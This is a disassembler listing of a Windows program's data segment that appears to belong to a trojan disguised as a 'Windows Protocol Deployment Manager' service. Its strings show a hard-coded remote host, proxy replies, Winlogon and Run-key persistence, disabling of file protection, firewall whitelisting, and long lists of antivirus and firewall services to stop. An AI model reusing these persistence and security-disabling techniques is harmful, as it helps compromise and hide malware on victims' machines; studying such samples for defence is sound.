aNull: ; DATA XREF: seg001:off_40DA7C�o
unicode 0, <(null)>,0
align 10h
aNull_0 db '(null)',0 ; DATA XREF: seg001:off_40DA78�o
align 4
aRuntimeError db 'runtime error ',0
align 4
db 0Dh,0Ah,0
align 4
aTlossError db 'TLOSS error',0Dh,0Ah,0
align 4
aSingError db 'SING error',0Dh,0Ah,0
align 4
aDomainError db 'DOMAIN error',0Dh,0Ah,0
align 4
aR6028UnableToI db 'R6028',0Dh,0Ah
db '- unable to initialize heap',0Dh,0Ah,0
align 4
aR6027NotEnough db 'R6027',0Dh,0Ah
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 4
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 4
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 4
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 4
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 10h
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 4
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 4
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aAbnormalProgra db 0Dh,0Ah
db 'abnormal program termination',0Dh,0Ah,0
align 4
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 4
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: seg001:off_40DD34�o
db '- floating point not loaded',0Dh,0Ah,0
align 4
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: sub_406BC4+119�o
align 4
asc_40A52C db 0Ah ; DATA XREF: sub_406BC4+F1�o
db 0Ah,0
align 10h
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: sub_406BC4+D3�o
db 0Ah
db 'Program: ',0
align 4
a___ db '...',0 ; DATA XREF: sub_406BC4+BF�o
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: sub_406BC4+7D�o
align 4
aSunmontuewedth db 'SunMonTueWedThuFriSat',0
align 10h
aJanfebmaraprma db 'JanFebMarAprMayJunJulAugSepOctNovDec',0
align 4
aTz db 'TZ',0 ; DATA XREF: sub_40728A+A�o
align 4
dword_40A5AC dd 0 ; DATA XREF: sub_407C95+52�o
; sub_407DDE+57�o ...
dword_40A5B0 dd 2 dup(0) ; DATA XREF: sub_407C95+39�o
; sub_407DDE+36�o ...
dword_40A5B8 dd 0FFFFFFFFh, 407D8Eh, 407D92h, 0 ; DATA XREF: sub_407C95+5�o
dword_40A5C8 dd 0FFFFFFFFh, 407EEEh, 407EF2h, 0FFFFFFFFh, 407FA2h, 407FA6h
; DATA XREF: sub_407DDE+5�o
aGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: sub_40844F+3D�o
align 4
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: sub_40844F+35�o
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: sub_40844F+24�o
aUser32_dll db 'user32.dll',0 ; DATA XREF: sub_40844F+D�o
align 10h
dword_40A620 dd 0FFFFFFFFh, 408D75h, 408D79h, 0FFFFFFFFh, 408DE4h, 408DE8h
; DATA XREF: sub_408BBE+5�o
dd 40A000h, 40A9FCh, 40A16Ch, 40AA14h, 40A060h, 40AB90h
dd 4 dup(0)
dd 0A6E8h, 64h dup(0)
dd 80000014h, 80000003h, 80000010h, 80000013h, 80000001h
dd 8000000Dh, 80000017h, 8000000Ch, 8000006Fh, 80000009h
dd 80000002h, 80000012h, 80000097h, 8000000Ah, 80000034h
dd 80000073h, 80000004h, 0
dd 65520000h, 6F6C4367h, 654B6573h, 79h, 53676552h, 61567465h
dd 4565756Ch, 4178h, 65520000h, 65704F67h, 79654B6Eh, 417845h
dd 65520000h, 65724367h, 4B657461h, 78457965h, 41h, 44676552h
dd 74656C65h, 6C615665h, 416575h, 65520000h, 65755167h
dd 61567972h, 4565756Ch, 4178h, 65520000h, 6C654467h, 4B657465h
dd 417965h, 65520000h, 756E4567h, 79654B6Dh, 417845h, 65520000h
dd 65755167h, 6E497972h, 654B6F66h, 4179h, 65520000h, 756E4567h
dd 6C61566Dh, 416575h, 6C430000h, 5365736Fh, 69767265h
dd 61486563h, 656C646Eh, 0
aQueryserviceco db 'QueryServiceConfigA',0
dd 65440000h, 6574656Ch, 76726553h, 656369h, 6F430000h
dd 6F72746Eh, 7265536Ch, 65636976h, 0
aChangeservicec db 'ChangeServiceConfigA',0
align 10h
aOpenservicea db 'OpenServiceA',0
align 10h
aOpenscmanagera db 'OpenSCManagerA',0
align 10h
dd 74530000h, 53747261h, 69767265h, 416563h, 68430000h
dd 65676E61h, 76726553h, 43656369h, 69666E6Fh, 413267h
dd 72430000h, 65746165h, 76726553h, 41656369h, 0
aSetservicestat db 'SetServiceStatus',0
align 10h
aRegisterservic db 'RegisterServiceCtrlHandlerExA',0
align 10h
aStartservicect db 'StartServiceCtrlDispatcherA',0
aAdvapi32_dll db 'ADVAPI32.dll',0
align 2
aPsapi_dll db 'PSAPI.DLL',0
aWsock32_dll db 'WSOCK32.dll',0
dd 6C530000h, 706565h, 69570000h, 6578456Eh, 63h, 4D746547h
dd 6C75646Fh, 6C694665h, 6D614E65h, 4165h, 72430000h, 65746165h
dd 65726854h, 6461h, 65470000h, 72754374h, 746E6572h, 636F7250h
dd 49737365h, 64h, 53746547h, 65747379h, 7269446Dh, 6F746365h
dd 417972h, 65440000h, 6574656Ch, 656C6946h, 41h, 74697845h
dd 636F7250h, 737365h, 6C430000h, 4865736Fh, 6C646E61h
dd 65h, 61657243h, 72506574h, 7365636Fh, 4173h, 65530000h
dd 6C694674h, 74744165h, 75626972h, 41736574h, 0
aCopyfilea db 'CopyFileA',0
align 4
aCreatedirector db 'CreateDirectoryA',0
align 4
aSetcurrentdire db 'SetCurrentDirectoryA',0
align 10h
aTerminateproce db 'TerminateProcess',0
align 4
aGetlasterror db 'GetLastError',0
align 4
aGetwindowsdire db 'GetWindowsDirectoryA',0
align 4
aLocalfree db 'LocalFree',0
align 4
aLocalalloc db 'LocalAlloc',0
align 4
dd 736C0000h, 70637274h, 416E79h, 72430000h, 65746165h
dd 6574754Dh, 4178h, 65530000h, 72724574h, 6F4D726Fh, 6564h
dd 4E52454Bh, 32334C45h, 6C6C642Eh, 0
aHeapalloc db 'HeapAlloc',0
align 4
aGetcurrentproc db 'GetCurrentProcess',0
align 10h
aGettimezoneinf db 'GetTimeZoneInformation',0
align 4
dd 65470000h, 73795374h, 546D6574h, 656D69h, 65470000h
dd 636F4C74h, 69546C61h, 656Dh, 65480000h, 72467061h, 6565h
dd 74520000h, 776E556Ch, 646E69h, 65470000h, 646F4D74h
dd 48656C75h, 6C646E61h, 4165h, 65470000h, 61745374h, 70757472h
dd 6F666E49h, 41h, 43746547h, 616D6D6Fh, 694C646Eh, 41656Eh
dd 65470000h, 72655674h, 6E6F6973h, 0
aGetenvironment db 'GetEnvironmentVariableA',0
dd 65470000h, 72655674h, 6E6F6973h, 417845h, 65480000h
dd 65447061h, 6F727473h, 79h, 70616548h, 61657243h, 6574h
dd 69560000h, 61757472h, 6572466Ch, 65h, 74726956h, 416C6175h
dd 636F6C6Ch, 0
aHeaprealloc db 'HeapReAlloc',0
dd 6E550000h, 646E6168h, 4564656Ch, 70656378h, 6E6F6974h
dd 746C6946h, 7265h, 72460000h, 6E456565h, 6F726976h, 6E656D6Eh
dd 72745374h, 73676E69h, 41h, 65657246h, 69766E45h, 6D6E6F72h
dd 53746E65h, 6E697274h, 577367h, 69570000h, 68436564h
dd 6F547261h, 746C754Dh, 74794269h, 65h, 45746547h, 7269766Eh
dd 656D6E6Fh, 7453746Eh, 676E6972h, 73h, 45746547h, 7269766Eh
dd 656D6E6Fh, 7453746Eh, 676E6972h, 5773h, 65530000h, 6E614874h
dd 43656C64h, 746E756Fh, 0
aGetstdhandle db 'GetStdHandle',0
align 4
aGetfiletype db 'GetFileType',0
dd 72570000h, 46657469h, 656C69h, 65530000h, 6C694674h
dd 696F5065h, 7265746Eh, 0
aMultibytetowid db 'MultiByteToWideChar',0
dd 65470000h, 72745374h, 54676E69h, 41657079h, 0
aGetstringtypew db 'GetStringTypeW',0
align 4
dd 434C0000h, 5370614Dh, 6E697274h, 4167h, 434C0000h, 5370614Dh
dd 6E697274h, 5767h, 65470000h, 49504374h, 6F666Eh, 65470000h
dd 50434174h, 0
aGetoemcp db 'GetOEMCP',0
align 4
aGetprocaddress db 'GetProcAddress',0
align 4
dd 6F4C0000h, 694C6461h, 72617262h, 4179h, 65530000h, 64745374h
dd 646E6148h, 656Ch, 6C460000h, 46687375h, 42656C69h, 65666675h
dd 7372h, 6F430000h, 7261706Dh, 72745365h, 41676E69h, 0
aComparestringw db 'CompareStringW',0
align 4
db 0
align 2
aSetenvironment db 'SetEnvironmentVariableA',0
align 10h
dd 54h dup(0)
dword_40B000 dd 0 ; DATA XREF: sub_4038D4+1F�o
dword_40B004 dd 0 ; DATA XREF: sub_4038D4+1A�o
dword_40B008 dd 0 ; DATA XREF: sub_4038D4+10�o
dd offset sub_407A85
dd offset sub_408433
dword_40B014 dd 0 ; DATA XREF: sub_4038D4:loc_4038DF�o
dword_40B018 dd 0 ; DATA XREF: sub_403923+65�o
dd offset sub_407B2A
dword_40B020 dd 0 ; DATA XREF: sub_403923:loc_403983�o
dword_40B024 dd 0 ; DATA XREF: sub_403923+76�o
dword_40B028 dd 2 dup(0) ; DATA XREF: sub_403923:loc_403994�o
dword_40B030 dd 6425h ; DATA XREF: sub_401586+32�o
aHost238_hl556_ db 'host238.hl556.com',0 ; DATA XREF: sub_401586+12�o
align 4
aExceptionSAtAd db 'Exception: %s at address 0x%08x in win32',0Ah,0
; DATA XREF: sub_401635+26A�o
align 4
aFloatUderflow db 'Float Uderflow',0 ; DATA XREF: sub_401635:loc_40187E�o
align 4
aIntegerDivideB db 'Integer Divide by Zero',0 ; DATA XREF: sub_401635:loc_401877�o
align 4
aIntegerOverflo db 'Integer Overflow',0 ; DATA XREF: sub_401635:loc_401870�o
align 10h
aPrivilegedInst db 'Privileged Instruction',0 ; DATA XREF: sub_401635:loc_401869�o
align 4
aStackOverflow db 'Stack Overflow',0 ; DATA XREF: sub_401635:loc_401862�o
align 4
aCtrlCExit db 'Ctrl+C Exit',0 ; DATA XREF: sub_401635:loc_40185B�o
aUnknownExcepti db 'Unknown exception',0 ; DATA XREF: sub_401635:loc_401854�o
align 4
aFloatStackChec db 'Float Stack Check',0 ; DATA XREF: sub_401635:loc_40181D�o
align 4
aInvalidDisposi db 'Invalid Disposition',0 ; DATA XREF: sub_401635:loc_401816�o
aArrayBoundsExc db 'Array Bounds Exceeded',0 ; DATA XREF: sub_401635:loc_40180F�o
align 4
aFloatDenormalO db 'Float Denormal Operand',0 ; DATA XREF: sub_401635:loc_401808�o
align 10h
aDivideByZero db 'Divide by Zero',0 ; DATA XREF: sub_401635:loc_401801�o
align 10h
aFloatInexactRe db 'Float Inexact Result',0 ; DATA XREF: sub_401635:loc_4017F7�o
align 4
aFloatInvalidOp db 'Float Invalid Operation',0 ; DATA XREF: sub_401635:loc_4017ED�o
aFloatOverflow db 'Float Overflow',0 ; DATA XREF: sub_401635+1AE�o
align 10h
aNoncontinuable db 'Noncontinuable Exception',0 ; DATA XREF: sub_401635:loc_401796�o
align 4
aAccessViolatio db 'Access Violation %s 0x%08x',0 ; DATA XREF: sub_401635+144�o
align 4
aReadingFrom db 'reading from',0 ; DATA XREF: sub_401635+135�o
align 4
aWritingTo db 'writing to',0 ; DATA XREF: sub_401635+12A�o
align 4
aInPageError db 'In Page Error',0 ; DATA XREF: sub_401635:loc_401753�o
align 4
aNoMemory db 'No Memory',0 ; DATA XREF: sub_401635:loc_401749�o
align 10h
aIllegalInstruc db 'Illegal Instruction',0 ; DATA XREF: sub_401635+10A�o
aDataTypeMisali db 'Data Type Misalignment',0 ; DATA XREF: sub_401635:loc_401701�o
align 4
aWait0 db 'Wait 0',0 ; DATA XREF: sub_401635:loc_4016F7�o
align 4
aAbandonedWait0 db 'Abandoned Wait 0',0 ; DATA XREF: sub_401635:loc_4016ED�o
align 4
aUserApc db 'User APC',0 ; DATA XREF: sub_401635:loc_4016E3�o
align 4
aTimeout db 'Timeout',0 ; DATA XREF: sub_401635:loc_4016D9�o
aPending db 'Pending',0 ; DATA XREF: sub_401635:loc_4016CF�o
aSegmentNotific db 'Segment Notification',0 ; DATA XREF: sub_401635:loc_4016C5�o
align 4
aGuardPageViola db 'Guard Page Violation',0 ; DATA XREF: sub_401635+86�o
align 4
aHttp1_0201Unab db 'HTTP/1.0 201 Unable to connect',0Dh,0Ah ; DATA XREF: sub_4018FD+BC3�o
db 'Proxy-agent: MSP/1.0',0Dh,0Ah
db 0Dh,0Ah,0
align 10h
aHttp1_0200Conn db 'HTTP/1.0 200 Connection established',0Dh,0Ah
; DATA XREF: sub_4018FD+B33�o
db 'Proxy-agent: MSP/1.0',0Dh,0Ah
db 0Dh,0Ah,0
align 10h
aD_D_D_D db '%d.%d.%d.%d',0 ; DATA XREF: sub_4018FD+859�o
; sub_4018FD+996�o
aHttp db 'http://',0 ; DATA XREF: sub_4018FD+388�o
aShell db 'Shell',0 ; DATA XREF: sub_4025AD+151�o
align 4
aUserinit db 'Userinit',0 ; DATA XREF: sub_4025AD+12E�o
align 4
aExplorer_exeS db 'Explorer.exe %s',0 ; DATA XREF: sub_4025AD+101�o
aSUserinit_exeS db '%s\userinit.exe,%s',0 ; DATA XREF: sub_4025AD+E8�o
align 4
aSoftwareMicr_1 db 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',0
; DATA XREF: sub_4025AD+AF�o
; sub_402716+21�o
align 4
aMicrosoftRWind db 'Microsoft (R) Windows Protocol Deployment Manager',0
; DATA XREF: sub_4025AD+9D�o
; sub_402849+42�o
align 4
aSoftwareMicr_0 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_4025AD+73�o
; sub_4031FA+24�o ...
align 4
aLoad db 'load',0 ; DATA XREF: sub_4025AD+62�o
align 10h
aSoftwareMicros db 'Software\Microsoft\Windows NT\CurrentVersion\Windows',0
; DATA XREF: sub_4025AD+32�o
align 4
aSoftwarePolici db 'SOFTWARE\Policies\Microsoft\Windows NT\Windows File Protection',0
; DATA XREF: sub_402716+51�o
align 4
aSfcdisable db 'SFCDisable',0 ; DATA XREF: sub_402716+3A�o
; sub_402716+66�o
align 4
aHidefileext db 'HideFileExt',0 ; DATA XREF: sub_40279C+95�o
aShowsuperhidde db 'ShowSuperHidden',0 ; DATA XREF: sub_40279C+84�o
aHidden db 'Hidden',0 ; DATA XREF: sub_40279C+73�o
align 4
aSoftwareMicr_3 db 'Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced',0
; DATA XREF: sub_40279C+5B�o
aNofolderoption db 'NoFolderOptions',0 ; DATA XREF: sub_40279C+46�o
aSoftwareMicr_2 db 'Software\Microsoft\Windows\CurrentVersion\Explorer',0
; DATA XREF: sub_40279C+23�o
align 4
aSEnabledS db '%s:*:Enabled:%s',0 ; DATA XREF: sub_402849+48�o
aSystemCurrentc db 'SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\Firewal'
; DATA XREF: sub_402849+14�o
; sub_4031FA+14�o
db 'lPolicy\StandardProfile\AuthorizedApplications\List',0
align 10h
aPath db 'Path',0 ; DATA XREF: sub_4028DE+70�o
; sub_40296A+3E�o
align 4
aSoftwareTmp db 'SOFTWARE\Tmp',0 ; DATA XREF: sub_4028DE+24�o
; sub_40296A+16�o
align 4
aSS db '%s\%s',0 ; DATA XREF: sub_4029DE+A1�o
; sub_402B5D+2F�o ...
align 10h
aWinsock db 'winsock',0 ; DATA XREF: sub_402D53+46�o
aProvidesImplem db 'Provides implementation support for third party network protocols'
; DATA XREF: sub_402DC2+9F�o
db '. Stopping or disabling this service will result in system insta'
db 'bility.',0
align 4
aWindowsProtoco db 'Windows Protocol Deployment Manager',0 ; DATA XREF: sub_402DC2+51�o
aPdm db 'PDM',0 ; DATA XREF: sub_402F19+B�o
; sub_4032FB:loc_4033B4�o
aSens db 'SENS',0 ; DATA XREF: sub_402F96+76�o
; sub_40301A+76�o
align 4
aRemoteregistry db 'RemoteRegistry',0 ; DATA XREF: sub_402F96+6A�o
align 4
aSamss db 'SamSs',0 ; DATA XREF: sub_402F96+5E�o
align 4
aSrservice db 'srservice',0 ; DATA XREF: sub_402F96+52�o
align 4
aWscsvc db 'wscsvc',0 ; DATA XREF: sub_402F96+46�o
align 10h
aMessenger db 'Messenger',0 ; DATA XREF: sub_402F96+3A�o
align 4
aHelpsvc db 'helpsvc',0 ; DATA XREF: sub_402F96+2E�o
aErsvc db 'ERSvc',0 ; DATA XREF: sub_402F96+22�o
align 4
aAlg db 'ALG',0 ; DATA XREF: sub_402F96+16�o
aAlerter db 'Alerter',0 ; DATA XREF: sub_402F96+A�o
aSharedaccess db 'SharedAccess',0 ; DATA XREF: sub_402F96�o
align 4
aSymantecCoreLc db 'Symantec Core LC',0 ; DATA XREF: sub_40301A+106�o
align 4
aRsravmon db 'RsRavMon',0 ; DATA XREF: sub_40301A+FA�o
align 4
aRsccenter db 'RsCCenter',0 ; DATA XREF: sub_40301A+EE�o
align 4
aMskservice db 'MskService',0 ; DATA XREF: sub_40301A+E2�o
align 10h
aMctaskmanager db 'McTaskManager',0 ; DATA XREF: sub_40301A+D6�o
align 10h
aMcafeeframewor db 'McAfeeFramework',0 ; DATA XREF: sub_40301A+CA�o
aKvwsc db 'KVWSC',0 ; DATA XREF: sub_40301A+BE�o
align 4
aKvsrvxp db 'KVSrvXP',0 ; DATA XREF: sub_40301A+B2�o
aKpfwsvc db 'KPfwSvc',0 ; DATA XREF: sub_40301A+A6�o
aFiresvc db 'FireSvc',0 ; DATA XREF: sub_40301A+9A�o
aAvp db 'AVP',0 ; DATA XREF: sub_40301A+8E�o
aKavsvc db 'kavsvc',0 ; DATA XREF: sub_40301A+82�o
align 4
aCcsetmgr db 'ccSetMgr',0 ; DATA XREF: sub_40301A+6A�o
align 4
aSndsrvc db 'SNDSrvc',0 ; DATA XREF: sub_40301A+5E�o
aSavscan db 'SAVScan',0 ; DATA XREF: sub_40301A+52�o
aNscservice db 'NSCService',0 ; DATA XREF: sub_40301A+46�o
align 4
aNavapsvc db 'navapsvc',0 ; DATA XREF: sub_40301A+3A�o
align 10h
aLiveupdate db 'LiveUpdate',0 ; DATA XREF: sub_40301A+2E�o
align 4
aMcshield db 'McShield',0 ; DATA XREF: sub_40301A+22�o
align 4
aMcdetect_exe db 'McDetect.exe',0 ; DATA XREF: sub_40301A+16�o
align 4
aMctskshd_exe db 'McTskshd.exe',0 ; DATA XREF: sub_40301A+A�o
align 4
aMcupdmgr_exe db 'mcupdmgr.exe',0 ; DATA XREF: sub_40301A�o
align 4
aSpbbcsvc db 'SPBBCSvc',0 ; DATA XREF: sub_40312E+BE�o
align 4
aCclspwdsvc db 'cclSPwdSvc',0 ; DATA XREF: sub_40312E+B2�o
align 10h
aCcproxy db 'ccProxy',0 ; DATA XREF: sub_40312E+A6�o
aCcevtmgr db 'ccEvtMgr',0 ; DATA XREF: sub_40312E+9A�o
align 4
aNpfmntor db 'NPFMntor',0 ; DATA XREF: sub_40312E+8E�o
align 10h
aVsmon db 'vsmon',0 ; DATA XREF: sub_40312E+82�o
align 4
aMpfservice db 'MpfService',0 ; DATA XREF: sub_40312E+76�o
align 4
aLavasoftfirewa db 'LavasoftFirewall',0 ; DATA XREF: sub_40312E+6A�o
align 4
aOutpostfirewal db 'OutpostFirewall',0 ; DATA XREF: sub_40312E+5E�o
aAvg7alrt db 'Avg7Alrt',0 ; DATA XREF: sub_40312E+52�o
align 4
aAvgfwsrv db 'AVGFwSrv',0 ; DATA XREF: sub_40312E+46�o
align 10h
aWinroute db 'WinRoute',0 ; DATA XREF: sub_40312E+3A�o
align 4
aWebrootfirewal db 'WebrootFirewall',0 ; DATA XREF: sub_40312E+2E�o
aKpf4 db 'KPF4',0 ; DATA XREF: sub_40312E+22�o
align 4
aUmxagent db 'UmxAgent',0 ; DATA XREF: sub_40312E+16�o
align 10h
aUmxcfg db 'UmxCfg',0 ; DATA XREF: sub_40312E+A�o
align 4
aCaisafe db 'CAISafe',0 ; DATA XREF: sub_40312E�o
aSoftwareMicr_7 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx',0
; DATA XREF: sub_4031FA+46�o
aSoftwareMicr_6 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',0
; DATA XREF: sub_4031FA+3A�o
align 4
aSoftwareMicr_5 db 'Software\Microsoft\Windows\CurrentVersion\RunServices',0
; DATA XREF: sub_4031FA+2F�o
; sub_4031FA+5D�o
align 10h
aSoftwareMicr_4 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper'
; DATA XREF: sub_4031FA+9�o
db ' Objects\',0
align 4
aVistaruntimesv db 'VistaRuntimeSvc',0 ; DATA XREF: sub_40327B+2E�o
aNtrcs db 'ntrcs',0 ; DATA XREF: sub_40327B+22�o
align 4
aNsms db 'nsms',0 ; DATA XREF: sub_40327B+16�o
align 4
aNlc db 'nlc',0 ; DATA XREF: sub_40327B+A�o
aWsas db 'wsas',0 ; DATA XREF: sub_40327B�o
align 4
aWpdm_class_ db 'WPDM_Class_',0 ; DATA XREF: sub_4032B7�o
aPdm_exe db 'pdm.exe',0 ; DATA XREF: sub_4032FB+A5�o
aSystem32 db 'system32',0 ; DATA XREF: sub_4032FB+6D�o
align 4
aSysdir db '%SYSDIR%',0 ; DATA XREF: sub_4032FB:loc_403343�o
align 4
aWindir db '%WINDIR%',0 ; DATA XREF: sub_4032FB+28�o
align 10h
dword_40BA20 dd 1 ; DATA XREF: sub_403E68+4�w sub_403E72�r ...
align 10h
dword_40BA30 dd 19930520h, 3 dup(0) ; DATA XREF: seg001:00403F8F�o
; sub_403F96+2�o
off_40BA40 dd offset sub_403912 ; DATA XREF: sub_4042F6+1C�r
dword_40BA44 dd 2 ; DATA XREF: sub_406B8B+E�r
; sub_406BC4+46�r ...
dd 10h, 0
off_40BA50 dd offset off_40BA50 ; DATA XREF: sub_405073+D�o
; sub_405073+69�o ...
off_40BA54 dd offset off_40BA50 ; DATA XREF: sub_405073:loc_4050F3�r
; sub_405073+89�w ...
dd offset dword_40BA68
dd offset dword_40BA68
dword_40BA60 dd 0FFFFFFFFh ; DATA XREF: sub_405073�r
; sub_4051B7:loc_405204�w
dd 0FFFFFFFFh
dword_40BA68 dd 0F0h, 0F1h, 800h dup(0) ; DATA XREF: seg001:0040BA58�o
; seg001:0040BA5C�o
off_40DA70 dd offset off_40BA50 ; DATA XREF: sub_4051B7+15�r
; sub_4051B7+20�w ...
dword_40DA74 dd 1E0h ; DATA XREF: sub_40349C:loc_4034D8�r
; sub_408845+51�r ...
off_40DA78 dd offset aNull_0 ; DATA XREF: sub_405917:loc_405C90�r
; sub_405917+488�r
; "(null)"
off_40DA7C dd offset aNull ; DATA XREF: sub_405917+26E�r
; "(null)"
off_40DA80 dd offset word_40DA8A ; DATA XREF: sub_403DA0+23�r
; sub_403DA0:loc_403E01�r ...
dd offset word_40DA8A
db 2 dup(0)
word_40DA8A dw 20h ; DATA XREF: sub_40803E+18�r
; seg001:off_40DA80�o ...
unicode 0, < ((((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(810081h), 0Ah dup(10001h), 3 dup(100010h), 3 dup(820082h)
dd 0Ah dup(20002h), 2 dup(100010h), 20h, 40h dup(0)
dword_40DC8C dd 1 ; DATA XREF: sub_403DA0:loc_403DA8�r
; sub_403DA0:loc_403DEC�r ...
dd 2Eh, 1, 2 dup(0)
dword_40DCA0 dd 0C0000005h ; DATA XREF: sub_40650D+A�r
; sub_40650D+11�o
dd 0Bh, 0
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
db 8Dh, 0
dw 0C000h
dd 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
db 90h
db 2 dup(0), 0C0h
dd 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_40DD18 dd 3 ; DATA XREF: sub_4063CC+58�r
dword_40DD1C dd 7 ; DATA XREF: sub_4063CC+5E�r
dword_40DD20 dd 0Ah ; DATA XREF: sub_40650D+4�r
dword_40DD24 dd 8Ch ; DATA XREF: sub_4063CC+82�r
; sub_4063CC+8F�w ...
dword_40DD28 dd 0FFFFFFFFh, 0A00h ; DATA XREF: sub_405802:loc_4058BF�o
dword_40DD30 dd 2 ; DATA XREF: sub_406BC4+E�o
; sub_406BC4+28�r
off_40DD34 dd offset aR6002FloatingP ; DATA XREF: sub_406BC4+FC�r
; sub_406BC4+12D�r
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 40A4B0h, 9, 40A484h, 0Ah, 40A460h, 10h, 40A434h
dd 11h, 40A404h, 12h, 40A3E0h, 13h, 40A3B4h, 18h, 40A37Ch
dd 19h, 40A354h, 1Ah, 40A31Ch, 1Bh, 40A2E4h, 1Ch, 40A2BCh
dd 78h, 40A2ACh, 79h, 40A29Ch, 7Ah, 40A28Ch, 0FCh, 40A288h
dd 0FFh, 40A278h
dword_40DDC0 dd 7080h ; DATA XREF: sub_405740+76�r
; sub_406BC4+1B�o ...
dword_40DDC4 dd 1 ; DATA XREF: sub_405740+98�r
; sub_40728A+8B�w ...
dword_40DDC8 dd 0FFFFF1F0h ; DATA XREF: sub_405740:loc_4057F2�r
; sub_40728A+94�w ...
dword_40DDCC dd 545350h, 0Fh dup(0) ; DATA XREF: seg001:off_40DE4C�o
dword_40DE0C dd 544450h, 0Fh dup(0) ; DATA XREF: seg001:off_40DE50�o
off_40DE4C dd offset dword_40DDCC ; DATA XREF: sub_40728A+BA�r
; sub_40728A+D9�r ...
off_40DE50 dd offset dword_40DE0C ; DATA XREF: sub_40728A+F4�r
; sub_40728A+11B�r ...
align 8
dword_40DE58 dd 0FFFFFFFFh ; DATA XREF: sub_40728A+1D�w
; sub_4074E8+1E�r ...
dword_40DE5C dd 0 ; DATA XREF: sub_4074E8:loc_40761C�r
; sub_407694+BF�w
dword_40DE60 dd 0 ; DATA XREF: sub_4074E8+192�r
; sub_407694+E0�w
align 8
dword_40DE68 dd 0FFFFFFFFh ; DATA XREF: sub_40728A+17�w
; sub_4074E8+26�r ...
dword_40DE6C dd 0 ; DATA XREF: sub_4074E8+13A�r
; sub_407694+EA�w ...
dword_40DE70 dd 0 ; DATA XREF: sub_4074E8+1A1�r
; sub_407694+23�r ...
dword_40DE74 dd 0FFFFFFFFh ; DATA XREF: sub_407694+84�r
dd 1Eh, 3Bh, 5Ah, 78h, 97h, 0B5h, 0D4h, 0F3h, 111h, 130h
dd 14Eh
dword_40DEA4 dd 16Dh ; DATA XREF: sub_405740+2A�r
; sub_407694+2E�r ...
dword_40DEA8 dd 0FFFFFFFFh ; DATA XREF: sub_407694:loc_407720�r
dd 1Eh, 3Ah, 59h, 77h, 96h, 0B4h, 0D3h, 0F2h, 110h, 12Fh
dd 14Dh, 16Ch, 0
off_40DEE0 dd offset dword_40F500 ; DATA XREF: sub_407A85+55�o
dd 0
dd offset dword_40F500
dd 101h
dword_40DEF0 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_407A85+72�o
dd 1000h, 0
dword_40DF00 dd 3 dup(0) ; DATA XREF: sub_405802+50�o
dd 2, 0FFFFFFFFh, 3 dup(0)
dword_40DF20 dd 3 dup(0) ; DATA XREF: sub_405802+58�o
dd 2, 0FFFFFFFFh, 7 dup(0)
dword_40DF50 dd 84h dup(0) ; DATA XREF: sub_407A85+9B�o
off_40E160 dd offset sub_408A5B ; DATA XREF: sub_405917+3F0�r
; sub_407A85+69�o
off_40E164 dd offset sub_408A5B ; DATA XREF: sub_405917+41C�r
dd offset sub_408A5B
off_40E16C dd offset sub_408A5B ; DATA XREF: sub_405917+40B�r
dd offset sub_408A5B
dd offset sub_408A5B
align 10h
byte_40E180 db 1 ; DATA XREF: sub_40806F+E1�r
db 2, 4, 8
align 8
dword_40E188 dd 3A4h ; DATA XREF: sub_40806F+2F�o
dword_40E18C dd 82798260h, 21h, 0 ; DATA XREF: sub_40806F+11D�r
dword_40E198 dd 0DFA6h ; DATA XREF: sub_40806F+C0�r
align 10h
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
dword_40E278 dd 2 dup(0) ; DATA XREF: sub_40806F+3C�o
dword_40E280 dd 1 ; DATA XREF: sub_408727+C�o
dword_40E284 dd 16h ; DATA XREF: sub_408727:loc_40875C�r
dd 2 dup(2), 3, 2, 4, 18h, 5, 0Dh, 6, 9, 7, 0Ch, 8, 0Ch
